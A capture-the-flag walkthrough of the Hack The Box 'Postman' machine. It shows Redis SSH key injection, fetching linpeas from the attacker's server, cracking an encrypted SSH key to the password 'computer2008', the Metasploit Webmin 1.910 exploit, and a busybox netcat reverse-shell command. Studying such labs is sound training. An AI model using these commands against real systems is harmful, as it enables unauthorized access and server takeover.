Postman HTB Writeup - Complete Walkthrough
Introduction
This is a complete walkthrough and writeup for the Postman machine from Hack The Box (HTB). In this guide, we’ll exploit a vulnerable Redis instance to gain initial access, perform lateral movement by cracking an encrypted SSH key, and finally escalate to root privileges through a Webmin vulnerability. This writeup covers reconnaissance with Nmap, exploiting Redis 4.0.9, privilege escalation using ssh2john and hashcat, and leveraging Metasploit for the final exploitation.
Whether you’re preparing for the OSCP, studying for penetration testing certifications, or simply looking to improve your CTF skills, this HTB Postman writeup will provide you with detailed steps and explanations for each phase of the attack.
Initial Enumeration
Nmap Scan
We begin with an Nmap scan to identify open ports and running services:
1 | PORT STATE SERVICE REASON VERSION |
From the scan, we identify several interesting services:
- Port 80: Apache web server hosting a basic website
- Port 10000: Webmin portal (version 1.910)
- Port 6379: Redis key-value store version 4.0.9
The Redis service on port 6379 looks particularly promising for initial access.
Initial Access - Redis Exploitation
Connecting to Redis
Let’s connect to the Redis instance to gather information:
1 | redis-cli -h <IP> -p 6379 |
Using the INFO command, we can gather valuable information about the Redis server configuration, which will be useful for exploitation.
Exploiting Redis for SSH Access
According to HackTricks, Redis version 4.0.9 is vulnerable to multiple exploitation techniques. While there’s an automated RCE script for Redis (<=5.0.5), we’ll use the manual SSH key injection method for more reliability.
Manual SSH Key Injection
Follow these steps to inject your SSH public key into the Redis server:
1. Generate an SSH key pair on your attacking machine:
1 | ssh-keygen -t rsa |
2. Write the public key to a file with spacing:
1 | (echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt |
3. Import the file into Redis:
1 | cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key |
4. Save the public key to the authorized_keys file on the Redis server:
1 | root@Urahara:~# redis-cli -h 10.85.0.52 10.85.0.52:6379> config set dir /var/lib/redis/.ssh OK 10.85.0.52:6379> config set dbfilename "authorized_keys" OK 10.85.0.52:6379> save OK |
5. SSH into the Redis server with your private key:
1 | ssh -i id_rsa redis@10.85.0.52 |
Alternative: Automated Script
Alternatively, you can use this automated exploit script:
1 | https://github.com/Avinash-acid/Redis-Server-Exploit |
Note: If you encounter problems when setting the ssh_key, run:
1 | redis-cli -h 10.129.2.1 CONFIG SET slave-read-only no |
Gaining Initial Shell
Finally, SSH into the machine:
1 | ssh -i id_rsa redis@10.129.2.1 |
Once inside, we can see a user named Matt in the /home directory who holds the user.txt file. We need to escalate our privileges to this user.
Lateral Movement - Redis to Matt
Enumeration with Linpeas
We’ll upload and run Linpeas to identify privilege escalation vectors:
On your attacking machine:
1 | python3 -m http.server 8080 |
On the target (in the /tmp folder):
1 | wget http://(Your IP):8080/linpeas.sh |
Cracking the Encrypted SSH Key
Linpeas discovers an id_rsa.bak file in /opt. This backup SSH key is encrypted, so we’ll need to crack it.
Extract the hash using ssh2john:
1 | ssh2john hash12 > hash_final |
Crack the hash using hashcat:
1 | hashcat -m 22911 hash_final /usr/share/wordlists/rockyou.txt |
Note: If you encounter an error, remove the first part of the hash file that contains the filename.
The password cracks to: computer2008
This password likely belongs to the user Matt. Let’s switch users:
1 | su Matt |
Success! We now have access to Matt’s account and can read the user.txt flag.
Privilege Escalation to Root
Checking Sudo Privileges
First, let’s check if Matt has any sudo privileges:
1 | Matt@Postman:~$ sudo -l |
Unfortunately, Matt cannot run sudo commands.
Webmin Exploitation
Let’s revisit the Webmin service we discovered during enumeration. We can now use Matt’s credentials:
Credentials:
1 | Matt:computer2008 |
Upon login, we receive a popup notification indicating there are 1000+ available updates. This suggests the Webmin installation is outdated and potentially vulnerable.
Checking the Webmin version:
1 | Matt@Postman:/etc/webmin$ cat version |
Metasploit - Webmin 1.910 RCE
Webmin version 1.910 has a known remote code execution vulnerability. There’s a Metasploit module that automates this exploitation:
Metasploit commands:
1 | use linux/http/webmin_packageup_rce |
Stabilizing the Shell
After obtaining a shell through Metasploit, you may experience issues with directory navigation. Use the following command to get a more stable shell:
On the target:
1 | busybox nc (your ip) 9001 -e sh |
On your attacking machine:
1 | nc -lvnp 9001 |
Success! We now have root access and can read the root.txt flag in the /root directory.
Conclusion
The Postman machine from Hack The Box provided an excellent opportunity to practice several important penetration testing techniques:
- Redis exploitation - Leveraging misconfigured Redis instances to gain initial access
- SSH key cracking - Using ssh2john and hashcat to crack encrypted SSH keys
- Lateral movement - Pivoting between users using discovered credentials
- Webmin exploitation - Exploiting known vulnerabilities in web administration panels
This box emphasizes the importance of proper service configuration, strong password policies, and keeping software up to date. I hope this HTB Postman writeup and walkthrough was helpful for your learning journey!
Tools Used
- Nmap
- redis-cli
- ssh2john
- Hashcat
- Linpeas
- Metasploit Framework
- Netcat